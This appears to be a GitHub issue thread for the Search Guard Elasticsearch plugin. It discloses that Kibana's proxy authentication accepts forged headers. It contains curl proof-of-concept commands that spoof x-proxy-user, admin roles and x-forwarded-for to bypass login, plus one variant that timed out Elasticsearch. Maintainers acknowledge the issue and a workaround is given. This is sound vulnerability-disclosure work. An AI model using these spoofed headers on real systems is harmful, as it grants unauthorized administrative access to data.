### ISSUE TITLE
[Security] Proxy authentication w/ kibana may expose ElasticSearch data

### ISSUE THREAD

**Issue by ChessSpider** [floragunncom/search-guard#539]
## Problem

Following these instructions may lead to insecure elasticsearch stack:  https://docs.search-guard.com/latest/kibana-authentication-proxy, because Kibana trusts every incoming request as being from the reverse proxy. While ElasticSearch is configured to trust Kibana 100%.

### Demo

Without authentication headers: 
```
$ curl -s -o /dev/null -w "%{http_code}"  http://localhost:5601/app/kibana
401
```
Kibana:
`kibana_1         | {"type":"response","@timestamp":"2018-08-09T14:46:48Z","tags":[],"pid":1,"method":"get","statusCode":401,"req":{"url":"/app/kibana","method":"get","headers":{"host":"localhost:5601","user-agent":"curl/7.58.0","accept":"*/*"},"remoteAddress":"172.19.1.1","userAgent":"172.19.1.1"},"res":{"statusCode":401,"responseTime":19,"contentLength":9},"message":"GET /app/kibana 401 19ms - 9.0B"}`

With authentication headers:  

```
$ curl -s -o /dev/null -w "%{http_code}" --header "x-proxy-user: pwnd"  --header "x-proxy-roles: admin" --header "x-forwarded-for: 123.123.123.123" http://localhost:5601/app/kibana
200
```
Kibana:
`{"type":"response","@timestamp":"2018-08-09T14:47:51Z","tags":[],"pid":1,"method":"get","statusCode":200,"req":{"url":"/app/kibana","method":"get","headers":{"host":"localhost:5601","user-agent":"curl/7.58.0","accept":"*/*","x-proxy-user":"pwnd","x-proxy-roles":"admin","x-forwarded-for":"123.123.123.123"},"remoteAddress":"172.19.1.1","userAgent":"172.19.1.1"},"res":{"statusCode":200,"responseTime":22,"contentLength":9},"message":"GET /app/kibana 200 22ms - 9.0B"}`

This should also be 401, as the reverse proxy IP-address is 172.19.1.2 and only that IP should be trusted.

### Solution

Add the possibility and enforce an option for trusted reverse proxy configuration in Kibana, as is already possible for ElasticSearch. Additionally, if possible, add #419  as well. 

### Workaround

Make sure kibana can only be reached through the reverse proxy, and is not exposed on the LAN or WAN directly. 

### ElasticSearch fun

This request made elasticsearch time-out:

```
$ curl -s -o /dev/null -w "%{http_code}" --header "x-proxy-user: pwnd"  --header "x-proxy-roles: admin" --header "x-forwarded-for: 999.999.999.999" http://localhost:5601/app/kibana
200 
```

**Comment by floragunncom** [comment]
Thanks for reporting. At the moment indeed you have to make sure that Kibana is only accessible via proxy. We're already working on a re-implementation of the proxy authenticator which will also solve this issue.

**Comment by ChessSpider** [comment]
Awesome, in the mean time maybe update the documentation to inform the reader of the importance that Kibana is only reachable for the proxy. For example using a firewall.

**Comment by floragunncom** [comment]
Superseded by https://github.com/floragunncom/search-guard/issues/697
